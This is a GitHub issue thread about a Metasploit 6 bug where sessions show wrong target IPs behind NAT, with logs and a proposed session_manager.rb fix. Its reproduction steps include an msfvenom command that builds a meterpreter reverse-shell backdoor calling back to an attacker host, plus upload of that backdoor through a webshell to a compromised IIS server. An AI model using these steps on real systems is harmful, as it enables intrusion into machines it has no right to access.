Session is not displaying target IP’s address when using MSF6, for MSF5 it did

[jmbuk]

Steps to reproduce

In my lab environment, a target machine is behind a firewall, the outbound gateway for the target environment is 100.64.1.254, and the target IP is 172.16.99.5. The KALI host IP is 100.64.1.200.

When using MSF5 (Framework: 5.0.63-dev Console : 5.0.63-dev) a session is created from the target, using a backdoor created with msfvenom, the session correctly indicates the source and destination IPs and the target HOST real IP. (see image)

However when doing the exact same steps with MSF6 (note: a new backdoor is created with MSF6's msfvenom), the GW/FW IP is wrong and the target IP is missing (see screenshot).

Also, if I change the backdoor and the handler to use windows/x64/meterpreter/reverse_tcp instead of reverse_http. The GW/FW IP is correctly populated, but the target IP is still wrong. It is no longer missing, but instead of being 172.16.99.5, it is 100.65.1.254 which is the GW/FW IP. It should be 172.16.99.5. (See screenshot).

To see issue, create a backdoor (1 for each framework version) using using msfvenom:

1. msfvenom -p windows/x64/meterpreter/reverse_http lhost=100.64.1.200 lport=8080 -f exe -b \x00\xff -o backdoor.exe
2. Start msfconsole and use exploit/multihandler with set payload windows/x64/meterpreter/reverse_http and set LPORT 8080
3. Upload backdoor to a target host behind a firewall, in my case I use a webshell to upload to a compromised IIS server and the backdoor runs under an IUSR account.
4. once the session is created, from the msfconsole run sessions -x, you will see when using MSF6 the target IP is missing, when using MSF5 it was populated

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

Were you following a specific guide/tutorial or reading documentation?

No.

Expected behavior

The Target IP should correctly populate with the IP of the target machine. The GW/FW IP should also not be the local loopback, but the actually IP of the incoming connection.

Current behavior

With MSF5 everything works as it should, with MSF6 the target IP is either not populated, or populated incorrectly depending on what payload is used. Also the incoming IP address of the connection is wrong when using the reverse_http handler, but it is correct when using the reverse_tcp handler.

Metasploit version

Framework: 6.2.2-dev
Console : 6.2.2-dev

Additional Information

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse

[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=exploit/multi/handler

[multi/handler]
PAYLOAD=windows/x64/meterpreter/reverse_tcp
WORKSPACE=
VERBOSE=false
WfsDelay=2
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ExitOnSession=false
ListenerTimeout=0
LPORT=8081
LHOST=0.0.0.0
Target=0

Database Configuration

The database contains the following information:

Collapse

Session Type: Connected to msf. Connection type: postgresql.

ID	Hosts	Vulnerabilities	Notes	Services
1 (Current)	10	2	19	0
Total (1)	10	2	19	0

History

The following commands were ran during the session and before this issue occurred:

Collapse

47     set loglevel 3
48     resource /home/kali/.msf4/bdwin64HTTP8080.rc
49     resource /home/kali/.msf4/bdwin64TCP8081.rc
50     seesions -x
51     sessions -x
52     debug

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse

[06/17/2022 06:31:55] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[06/17/2022 06:31:55] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[06/17/2022 06:31:56] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[06/17/2022 06:31:56] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[06/17/2022 06:31:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:31:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:31:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:33:24] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () >
[06/17/2022 06:33:24] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () "NT AUTHORITY\IUSR @ SRV-DMZ-WS-A1">
[06/17/2022 06:33:24] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () "NT AUTHORITY\IUSR @ SRV-DMZ-WS-A1">

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse

msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse

[06/17/2022 06:00:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:00:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:00:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:00:58] [w(0)] core: The following modules could not be loaded!
[06/17/2022 06:00:58] [w(0)] core:      /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[06/17/2022 06:00:58] [w(0)] core:      /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[06/17/2022 06:00:58] [w(0)] core:      /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[06/17/2022 06:00:58] [d(0)] core: HistoryManager.push_context name: :msfconsole
[06/17/2022 06:03:25] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () >
[06/17/2022 06:03:25] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)
[06/17/2022 06:03:27] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () "NT AUTHORITY\IUSR @ SRV-DMZ-WS-A1">
[06/17/2022 06:03:27] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)
[06/17/2022 06:03:28] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () "NT AUTHORITY\IUSR @ SRV-DMZ-WS-A1">
[06/17/2022 06:10:06] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (2)
[06/17/2022 06:10:06] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (2)
[06/17/2022 06:29:44] [w(0)] core: Session 2 has died
[06/17/2022 06:31:30] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () "NT AUTHORITY\IUSR @ SRV-DMZ-WS-A1">
[06/17/2022 06:31:36] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[06/17/2022 06:31:55] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[06/17/2022 06:31:55] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[06/17/2022 06:31:56] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[06/17/2022 06:31:56] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[06/17/2022 06:31:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:31:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:31:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:31:58] [w(0)] core: The following modules could not be loaded!
[06/17/2022 06:31:58] [w(0)] core:      /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[06/17/2022 06:31:58] [w(0)] core:      /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[06/17/2022 06:31:58] [w(0)] core:      /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[06/17/2022 06:31:58] [d(0)] core: HistoryManager.push_context name: :msfconsole
[06/17/2022 06:32:37] [i(2)] core: Reloading exploit module multi/handler. Ambiguous module warnings are safe to ignore
[06/17/2022 06:32:37] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_http with multi/handler]: reverse to tunnel
[06/17/2022 06:32:37] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_http with multi/handler]: bind to tunnel
[06/17/2022 06:32:37] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_http with multi/handler]: noconn to tunnel
[06/17/2022 06:32:37] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_http with multi/handler]: none to tunnel
[06/17/2022 06:32:37] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_http with multi/handler]: tunnel to tunnel
[06/17/2022 06:32:37] [d(1)] core: Module windows/x64/meterpreter/reverse_http is compatible with multi/handler
[06/17/2022 06:33:24] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () >
[06/17/2022 06:33:24] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)
[06/17/2022 06:33:24] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () "NT AUTHORITY\IUSR @ SRV-DMZ-WS-A1">
[06/17/2022 06:33:24] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)
[06/17/2022 06:33:24] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () "NT AUTHORITY\IUSR @ SRV-DMZ-WS-A1">
[06/17/2022 06:34:00] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: reverse to reverse
[06/17/2022 06:34:00] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: bind to reverse
[06/17/2022 06:34:00] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: noconn to reverse
[06/17/2022 06:34:00] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: none to reverse
[06/17/2022 06:34:00] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: tunnel to reverse
[06/17/2022 06:34:00] [d(1)] core: Module windows/x64/meterpreter/reverse_tcp is compatible with multi/handler
[06/17/2022 06:34:39] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (2)
[06/17/2022 06:34:40] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (2)

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse

msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Collapse

Framework: 6.2.2-dev
Ruby: ruby 3.0.3p157 (2021-11-24 revision 3fb7d2cadc) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql.
Install Method: Other - Please specify

[jmbuk]

This appears to be the same problem as reported #15048 ((Sessions don't show correct victim IP addresses when using http and https payloads.)) Unfortunately, there wasn't a solution provided.
Also, if I do a db_disconnect, and then rerun the backdoor, the target IP is populated correctly. Maybe the problem is todo with reading the sessions -x info from the db?

[jmbuk]

Doing a little digging, in the RB file /usr/share/metasploit/lib/msf/base/session/meterpreter.rb, if the database was disconnected (db_disconnet) the correct value of the NATed target was being displayed. So self.session_host was being correctly set to nhost (which is 172.16.99.5 in my case)

This codes was being correctly executed:
if nhost && !(framework.db && framework.db.active)
self.session_host = nhost

However, when the db was connected the self.session_host was not being set to nhost. A little debugging, (unfortunately I am not a developer, and especially not a ruby developer) it looked like "self.db_record" was not defined. So the if statement on line 488, "if nhost and self.db_record" was not being entered (I put a print_status line in there, which wasn't being executed) and hence the nhost value was not being correctly applied to self.session_host.

This worked in MSF5, so I started comparing RB files between MSF5 and MSF6, and after some time doing some file compares, came across, lib/msf/core/session_manager.rb.
In MSF5, for the def register(session) there was a section of code that was not in the current MSF6 version of the file. The section of code was:

  # Notify the framework that we have a new session opening up...
  # Don't let errant event handlers kill our session
  begin
    framework.events.on_session_open(session)
  rescue ::Exception => e
    wlog("Exception in on_session_open event handler: #{e.class}: #{e}")
    wlog("Call Stack\n#{e.backtrace.join("\n")}")
  end

After adding it to the MSF6 version:
def register(session)
if (session.sid)
wlog("registered session passed to register again (sid #{session.sid}).")
return nil
end

next_sid = allocate_sid

# Initialize the session's sid and framework instance pointer
session.sid       = next_sid
session.framework = framework

# Only register if the session allows for it
if session.register?
  # Insert the session into the session hash table
  self[next_sid.to_i] = session

  # ***** ADDED THIS FROM MSF5 VERSION OF FILE *****
  # Notify the framework that we have a new session opening up...
  # Don't let errant event handlers kill our session
  begin
    framework.events.on_session_open(session)
  rescue ::Exception => e
    wlog("Exception in on_session_open event handler: #{e.class}: #{e}")
    wlog("Call Stack\n#{e.backtrace.join("\n")}")
  end

  # ***** ADDED ABOVE THIS FROM MSF5 VERSION OF FILE *****


  if session.respond_to?("console")
    session.console.on_command_proc = Proc.new { |command, error| framework.events.on_session_command(session, command) }
    session.console.on_print_proc = Proc.new { |output| framework.events.on_session_output(session, output) }
  end
  if session.respond_to?("on_registered")
    session.on_registered
  end
end

After I did this, all worked as it had when using MSF5.

As mentioned, I am not a developer, but hopefully when one is able to look at this they can figure out why this works and the consequences of adding it?

[adfoster-r7]

@jmbuk Thanks for taking a look 👍

It'd be great if you threw up a PR with your fix and replication steps - and we could see about getting your fixed merged in, or we could spot if there's any code changes to make

[jmbuk]

Hello @adfoster-r7 ,
I am not sure how to threw up an PR (are there instructions anywhere you can point me to?). Also I don't think my fix can be used asis (albeit it does work fine).
I think in MSF6 they replaced (in the lib/msf/core/session_manager.rb) :

begin
    framework.events.on_session_open(session)
  rescue ::Exception => e
    wlog("Exception in on_session_open event handler: #{e.class}: #{e}")
    wlog("Call Stack\n#{e.backtrace.join("\n")}")
  end

---

With

if session.respond_to?("on_registered")
    session.on_registered
  end

---

I believe both "framework.events.on_session_open(session)" and " session.on_registered" are meant to register the session, as I see that the session is registered twice (since adding the code back from MSF5) (however that hasn't caused a problem in my environment):

I think the question is, when using the new code, session.on_registered, why isn't self.db_record being populated?

However to answer your question the steps to replicate 'my fix' are to add back the following lines of code to lib/msf/core/session_manager.rb

  begin
    framework.events.on_session_open(session)
  rescue ::Exception => e
    wlog("Exception in on_session_open event handler: #{e.class}: #{e}")
    wlog("Call Stack\n#{e.backtrace.join("\n")}")
  end

after the following code:

def register(session)
if (session.sid)
wlog("registered session passed to register again (sid #{session.sid}).")
return nil
end

next_sid = allocate_sid

# Initialize the session's sid and framework instance pointer
session.sid       = next_sid
session.framework = framework

# Only register if the session allows for it
if session.register?
  # Insert the session into the session hash table
  self[next_sid.to_i] = session
  
 CODE FROM MSF5 session_manager.rb
  begin
    framework.events.on_session_open(session)
  rescue ::Exception => e
    wlog("Exception in on_session_open event handler: #{e.class}: #{e}")
    wlog("Call Stack\n#{e.backtrace.join("\n")}")
  end
  ......

[adfoster-r7]

Thanks for digging into this 👍

I'm not sure when we'd have the cycles to patch this up correctly and ensure that there's no edgecases involved in fixing this issue. Let me know if you think this would be a high priority bug that should be fixed and I'll see if it can get fixed sooner rather than later 👍

[jmbuk]

If I didn't have the work around, I would say it is high priority. However I have noticed other bugs entered, for example #15048, which have the same root cause. This will only happen when metasploit is behind a device doing NATing.

[github-actions]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.